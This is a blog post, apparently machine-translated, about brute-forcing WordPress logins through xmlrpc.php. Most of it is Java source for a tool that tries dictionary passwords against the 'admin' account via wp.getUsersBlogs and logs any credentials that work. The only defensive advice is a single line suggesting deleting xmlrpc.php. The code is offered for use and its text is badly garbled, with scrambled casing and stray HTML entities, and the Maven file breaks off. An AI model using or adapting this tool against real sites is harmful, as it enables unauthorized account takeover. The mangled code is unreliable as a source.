Wordpress xmlrpc.php brute force hack vulnerability

Wordpress xmlrpc.php brute force hack vulnerability

WordPress is a very popular open source blog, it provides a way to publish articles remotely, is the use of xmlrpc.php with the path of this file, the recent outbreak of xmlrpc loopholes, the vulnerability principle is through XMLRPC authentication, even if the authentication failed, Also will not be installed by the WordPress security plug-in record, so will not trigger the password error n times is locked in the case. As a result, it can be violently cracked, and if the password is a weak password, it is quite dangerous. The simplest solution is to delete the xmlrpc.php file. Idle to Nothing, with Java write a brute force hack script, in fact, is holding a variety of usernames, passwords to constantly call xmlrpc.phpp This file, detection certification results, very simple. Only for entertainment, violence to crack things, everyone cautious.

Xmlrpc.java source code is as follows:

    package com.yeetrack.security.wordpress;    import  org.apache.http.client.clientprotocolexception;    import  org.apache.http.client.config.requestconfig;    import  org.apache.http.client.methods.closeablehttpresponse;    import  org.apache.http.client.methods.httpget;    import  org.apache.http.client.methods.httppost;    import  org.apache.http.entity.stringentity;    import  org.apache.http.impl.client.closeablehttpclient;    import  org.apache.http.impl.client.httpclients;    import org.apache.http.util.entityutils;     import org.slf4j.Logger;    import  org.slf4j.loggerfactory;    import org.testng.annotations.test;     import java.io.*;&nbsP;   /**     * created by victor wang on  2014/8/2.     *  exploit Wordpress xmlrpc vulnerability, brute force password       */    public class Xmlrpc    {         private String userAgent =  "mozilla/5.0  (windows nt  6.1; wow64; rv:31.0)  gecko/20100101 firefox/31.0 ";         requestconfig requestconfig = requestconfig.custom (). Setconnectionrequesttimeout (4000). Setconnecttimeout (4000)                  .setsockettimeout (4000). Build ();         private static logger logger = loggerfactory.getlogger (Xmlrpc.class );         privaTe closeablehttpclient httpclient = httpclients.custom ()                  .setuseragent (userAgent)                  .setdefaultrequestconfig ( Requestconfig)                  . Build ();        /**          *  Verify that the domain name exists xmlrpc.php this file          */         private boolean checkxmlrpcfile (String domain)          {            domain  = wrapperurl (domain);             if ( Domain==null)                 return false;             httpget get = new httpget (" HTTP//"+domain+"/xmlrpc.php ");             Get.addheader ("User-agent",  useragent);             CloseableHttpResponse response = null;             String resultString = null;             try {                 response = httpclient.execute (GET);                 if (null == response | |  response.equals (""))                      return  false;                 Resultstring = entityutils.tostring (Response.getentity ());             } catch  (ioexception e)  {                 e.printstacktrace ();             }             return resultstring.contains ("xml-rpc server accepts post requests  Only. ");         }        /**          *  Violent attempts           */         private boolean forcelogin (string username, string  password, string url)         {             //trying to sign in              httppost post = new httppost ("http://" +wrapperurl (URL) + "/xmlrpc.php");             post.addheader ("User-Agent",  useragent);            string xmlstring  =  "<?xml version=\" 1.0\ " encoding=\" iso-8859-1\ "?><methodcall>  < methodname>wp.getusersblogs</methodname>  <params>   <param>< Value> "+username+" </value></param>   <param><value> "+password+" </ Value></param>&nbSp; </params></methodcall> ";             StringEntity entity = null;             try {                 entity = new stringentity (xmlstring);                 post.setentity (Entity);                 closeablehttpresponse response  = httpclient.execute (POST);                 string loginresult = entityutils.tostring (Response.getEntity ());                 if (null==  loginresult | |  loginresult.Equals (""))                      return false;                 if (Loginresult.contains ("ISAdmin"))  {                     logger.info (url +   "Login successful, Userename--->  + username + "   password---> " +  Password);                     return true;                 }            }  catch  (unsupportedencodingexception e)  {               &nbsP; e.printstacktrace ();            }  catch  (clientprotocolexception e)  {                 e.printstacktrace ();             } catch  (ioexception e)  {                 e.printstacktrace ();             }             return false;        }         /**         *  clean URL, remove HTTP///or End of path          */        private  String wrapperurl (String url)         {             if (null == url | |  url.equals (""))                  return null;            if ( Url.startswith ("http.//"))                  url = url.substring (7);             if (Url.contains ("/"))                  url = url.substring (0, url.indexof ("/"));             return url;        }         /**         *  hack          */          @Test         public void test ()          {             String url =  "http://somewordpress.com/xmlrpc.php";             if (!checkxmlrpcfile (URL))  {                 logger.info (url+ "---> No xmlrpc vulnerability");                 return;             }             file file = new file ("Src/main/resources/1pass00.txt");  //cipher dictionaries, a bunch of these online, Or you can build it yourself or   & it.nbsp;         try {                 FileReader fileReader = new  FileReader (file);                 bufferedreader bufferedreader = new bufferedreader (FileReader);                 String line =  null;                int  count = 1;                 while  ((Line = bufferedreader.readline ())  != null)  {                      System.out.println (""  + count +  "  "  + line);                     if (Forcelogin ("admin",  line, url))                           break;                     count++;                     //thread.sleep (+);                 }             } catch  (exception e)  { e.printstacktrace ();  }        }    }

The project uses MAVEN management, using Apache's httpclient and log4j, and thepom.xml code is as follows:

<?xml version= "1.0" encoding= "UTF-8"?> <project xmlns= "http://maven.apache.org/POM/4.0.0" Xmlns:xs I= "Http://www.w3.org/2001/XMLSchema-instance" xsi:schemalocation= "http://maven.apache.org/POM/4.0.0 Http://mav En.apache.org/xsd/maven-4.0.0.xsd "> <modelVersion>4.0.0</modelVersion> <groupid>com.yee Track.security</groupid> <artifactId>wordpress-xmlrpc</artifactId> <version>1.0-snap Shot</version>

Continue Reading-